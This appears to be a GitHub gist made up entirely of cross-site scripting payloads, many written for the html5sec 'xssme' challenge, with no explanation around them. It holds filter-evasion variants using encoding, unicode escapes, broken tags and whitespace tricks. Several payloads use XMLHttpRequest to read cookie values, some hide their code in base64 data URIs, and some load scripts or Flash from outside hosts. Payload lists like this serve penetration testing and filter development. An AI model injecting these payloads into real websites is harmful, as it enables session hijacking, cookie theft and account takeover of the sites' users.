<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> | |
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> | |
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> | |
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> | |
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E | |
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> | |
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E | |
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> | |
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> | |
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? | |
<var onmouseover="prompt(1)">On Mouse Over</var>? | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=``<div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>? | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ???????????? | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script ? | |
<img src ?itworksonchrome?\/onerror = alert(1)??? | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> ? | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
"><img src=x onerror=prompt(1);> | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment